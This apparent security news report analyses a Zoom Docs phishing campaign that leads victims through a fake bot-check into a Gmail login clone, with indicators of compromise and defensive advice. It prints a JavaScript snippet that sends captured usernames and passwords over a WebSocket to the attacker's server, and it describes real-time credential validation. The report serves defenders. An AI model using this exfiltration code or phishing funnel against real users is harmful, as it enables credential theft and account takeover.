A seemingly legitimate Zoom document share from “HR” redirected victims through a fake bot-protection gate into a Gmail login phish. User credentials are exfiltrated live via WebSocket and validated in real time.
This report breaks down the social engineering, the malicious infrastructure, proof-of-concept exfiltration code, and indicators of compromise to watch for.
Job seekers and employees alike trust Zoom notifications for document sharing. In one recent incident, an email titled “HR application” arrived from a valid Zoom Docs address. SPF, DKIM and DMARC all passed inspection, lulling the recipient into a false sense of security.
The link appeared as a standard Zoom document URL, but actually pointed to hxxps://overflow.qyrix[.]com.de/GAR@bBWe/, a server hosting a “Press & Hold to confirm” bot-protection widget.
On deeper inspection I realized the document link led to an offsite page that redirected to a classic Gmail credential harvesting page.
Upon passing the gate, the user was redirected to hxxps://overflow.qyrix[.]com.de/aoi99lxz7s0?id=02efd7fc7…, where a replica of the Gmail login UI awaited credentials. The entire funnel leveraged Zoom’s trusted platform to maximize click-through rates and avoid initial suspicion.
Technical Analysis
The phishing page not only mimicked Gmail’s interface, but also employed a WebSocket connection for real-time data theft.
When credentials are entered, the following snippet establishes a live channel to the attacker’s command-and-control server:
javascriptconst ws = new WebSocket('wss://overflow.qyrix.com.de/ws');
ws.onopen = () => {
const payload = JSON.stringify({ user: username, pass: password });
ws.send(payload);
ws.close();
};
Captured WebSocket frames confirmed immediate exfiltration of usernames and passwords. On the backend, the credentials are validated against Google authentication API, explaining the slight latency compared to static phishing pages.
This two-stage validation lets attackers sort valid logins from failures on the fly, accelerating follow-up exploitation or account takeover.
Prevention Strategies
Any Zoom share link pointing to a non-zoom.us domain should be treated as suspicious. The presence of a “Press & Hold” verification or any quiz before login is out of place for Google’s authentication flow.
SOC analysts should monitor for unexpected outbound WebSocket (ws:// or wss://) connections from browsers. In email gateways, URL rewriting and domain reputation checks can flag hxxps://overflow.qyrix.com.de as malicious.
If credentials have been submitted, immediate password resets via the official Google site are mandatory, followed by enabling two-factor authentication.
Users should inspect full email headers, verifying that the From domain matches the link domain. Security teams can block the malicious domain at DNS or proxy levels.
Reporting to Zoom’s abuse portal and Google’s phishing report form with screenshots and headers will aid takedown efforts. Encouraging the use of password managers adds another line of defense, as they will refuse to autofill credentials on off-domain pages.
In conclusion, while Zoom’s document-sharing features enhance collaboration, they can be abused as a trusted vector for sophisticated phishing campaigns.
A quick URL sanity check, header inspection, and awareness of unusual verification steps can protect your inbox—and your credentials—from this malicious HR masquerade.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
